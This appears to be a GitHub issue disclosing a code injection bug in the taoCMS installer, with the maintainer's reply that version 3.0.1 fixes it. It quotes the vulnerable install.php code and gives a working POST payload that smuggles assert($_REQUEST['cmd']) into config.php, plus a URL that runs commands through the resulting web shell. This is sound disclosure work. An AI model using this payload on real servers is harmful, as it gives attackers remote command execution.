search

taogogo / taocms

taoCMS is an incredible tiny CMS( Content Management System) , writen in PHP and support MySQL/Sqlite as the database(MIT License)
MIT License
60 stars 21 forks source link

one can insert malicious code in the installation process to get a web shell #1

Closed jadacheng closed 3 years ago

jadacheng commented 5 years ago

In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: ./install.php:234-238

    $configs=file_get_contents('config.php');
    $_POST['tb']&&$configs=str_replace('define(\'TB\',  \''.TB.'\');','define(\'TB\',   \''.$_POST['tb'].'\');',$configs);
    $_POST['db']&&$configs=str_replace('define(\'DB\',  \''.DB.'\');','define(\'DB\',   \''.$_POST['db'].'\');',$configs);
    $_POST['db_name']&&$configs=str_replace('define(\'DB_NAME\',    \''.DB_NAME.'\');','define(\'DB_NAME\', \''.$_POST['db_name'].'\');',$configs);
    file_put_contents('config.php',$configs);

payload:

/taocms-master/install.php [POST]db=Mysql&db_name=%7C127.0.0.1%3A3306%7Croot%7Croot%7Cwity%7C');assert($_REQUEST['cmd']);//&tb=test&Submit=%E7%82%B9%E5%87%BB%E6%AD%A4%E5%A4%84%E5%BC%80%E5%A7%8B%E5%AE%89%E8%A3%85%E5%85%8D%E8%B4%B9%E5%BC%80%E6%BA%90%E7%9A%84taoCMS%E7%B3%BB%E7%BB%9F

image

exploit: http://127.0.0.1/taocms-master/config.php?cmd=phpinfo();

image

taogogo commented 3 years ago

3.0.1 fixed, thanks for your contrubution

taogogo commented 3 years ago

3.0.1 fixed, thanks for your contrubution